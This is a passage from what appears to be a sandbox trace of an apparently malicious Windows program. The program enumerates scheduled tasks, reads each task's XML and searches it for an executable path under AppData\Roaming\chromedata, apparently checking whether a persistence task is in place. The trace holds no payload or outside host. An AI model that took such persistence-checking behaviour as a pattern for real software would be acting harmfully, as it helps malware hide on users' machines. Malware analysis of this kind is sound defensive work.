<Triggers>\r\n    <EventTrigger id=\"9ab90857-0ac9-49d3-845f-c235144fb537\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Application Popup'] and EventID=1801]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[PageNotZero]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.627] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9ab90857-0ac9-49d3-845f-c235144fb537\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Application Popup'] and EventID=1801]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[PageNotZero]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.656] IUnknown:Release (This=0x63ff88) returned 0x0
	[0099.656] IRegisteredTaskCollection:get_Item (in: This=0x63fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff88) returned 0x0
	[0099.656] IRegisteredTask:get_Name (in: This=0x63ff88, pName=0x128e3c | out: pName=0x128e3c*="DecompressionFailureDetector") returned 0x0
	[0099.656] IRegisteredTask:get_Xml (in: This=0x63ff88, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9DC9BDAA-AA47-4bca-8848-B96A2A5E0197\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;&lt;Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[Decompression]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.658] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9DC9BDAA-AA47-4bca-8848-B96A2A5E0197\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;&lt;Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[Decompression]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.687] IUnknown:Release (This=0x63ff88) returned 0x0
	[0099.687] IUnknown:Release (This=0x63fe90) returned 0x0
	[0099.687] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe90) returned 0x0
	[0099.688] ITaskFolderCollection:get_Count (in: This=0x63fe90, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.688] IUnknown:Release (This=0x63fe90) returned 0x0
	[0099.688] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.688] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xf, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.688] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0099.690] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0099.690] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0099.690] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="HotStart") returned 0x0
	[0099.690] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)</Author>\r\n    <URI>Microsoft\\Windows\\MobilePC\\HotStart</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{06DA0625-9701-43da-BFD7-FBEEA2180A1E}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.693] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)</Author>\r\n    <URI>Microsoft\\Windows\\MobilePC\\HotStart</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{06DA0625-9701-43da-BFD7-FBEEA2180A1E}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.721] IUnknown:Release (This=0x63ff68) returned 0x0
	[0099.721] IUnknown:Release (This=0x63fe80) returned 0x0
	[0099.721] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0099.723] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.723] IUnknown:Release (This=0x63fe80) returned 0x0
	[0099.723] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.723] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x10, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.723] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe78) returned 0x0
	[0099.724] IRegisteredTaskCollection:get_Count (in: This=0x63fe78, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0099.724] IRegisteredTaskCollection:get_Item (in: This=0x63fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff50) returned 0x0
	[0099.724] IRegisteredTask:get_Name (in: This=0x63ff50, pName=0x128e3c | out: pName=0x128e3c*="LPRemove") returned 0x0
	[0099.724] IRegisteredTask:get_Xml (in: This=0x63ff50, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Author>\r\n    <Source>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Source>\r\n    <Description>$(@%systemRoot%\\System32\\lpremove.exe,-101)</Description>\r\n    <URI>Microsoft\\Windows\\MUI\\LPRemove</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"BootTrigger\">\r\n      <Delay>PT25M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT9H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\lpremove.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.727] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Author>\r\n    <Source>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Source>\r\n    <Description>$(@%systemRoot%\\System32\\lpremove.exe,-101)</Description>\r\n    <URI>Microsoft\\Windows\\MUI\\LPRemove</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"BootTrigger\">\r\n      <Delay>PT25M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT9H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\lpremove.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.752] IUnknown:Release (This=0x63ff50) returned 0x0
	[0099.752] IUnknown:Release (This=0x63fe78) returned 0x0
	[0099.752] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe78) returned 0x0
	[0099.753] ITaskFolderCollection:get_Count (in: This=0x63fe78, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.753] IUnknown:Release (This=0x63fe78) returned 0x0
	[0099.753] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.753] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x11, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.753] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe88) returned 0x0
	[0099.755] IRegisteredTaskCollection:get_Count (in: This=0x63fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0099.755] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.755] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="SystemSoundsService") returned 0x0
	[0099.755] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-06-23T13:48:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)</Description>\r\n    <URI>Microsoft\\Windows\\Multimedia\\SystemSoundsService</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)</Source>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{2DEA658F-54C1-4227-AF9B-260AB5FC3543}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.757] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-06-23T13:48:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)</Description>\r\n    <URI>Microsoft\\Windows\\Multimedia\\SystemSoundsService</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)</Source>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{2DEA658F-54C1-4227-AF9B-260AB5FC3543}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.778] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.778] IUnknown:Release (This=0x63fe88) returned 0x0
	[0099.778] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe88) returned 0x0
	[0099.779] ITaskFolderCollection:get_Count (in: This=0x63fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.779] IUnknown:Release (This=0x63fe88) returned 0x0
	[0099.779] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.779] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x12, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.779] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0099.781] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0099.781] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0099.781] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="GatherNetworkInfo") returned 0x0
	[0099.781] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\nettrace.dll,-6910)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\nettrace.dll,-6911)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\nettrace.dll,-6912)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers />\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\gatherNetworkInfo.vbs</Command>\r\n      <WorkingDirectory>$(Arg1)</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
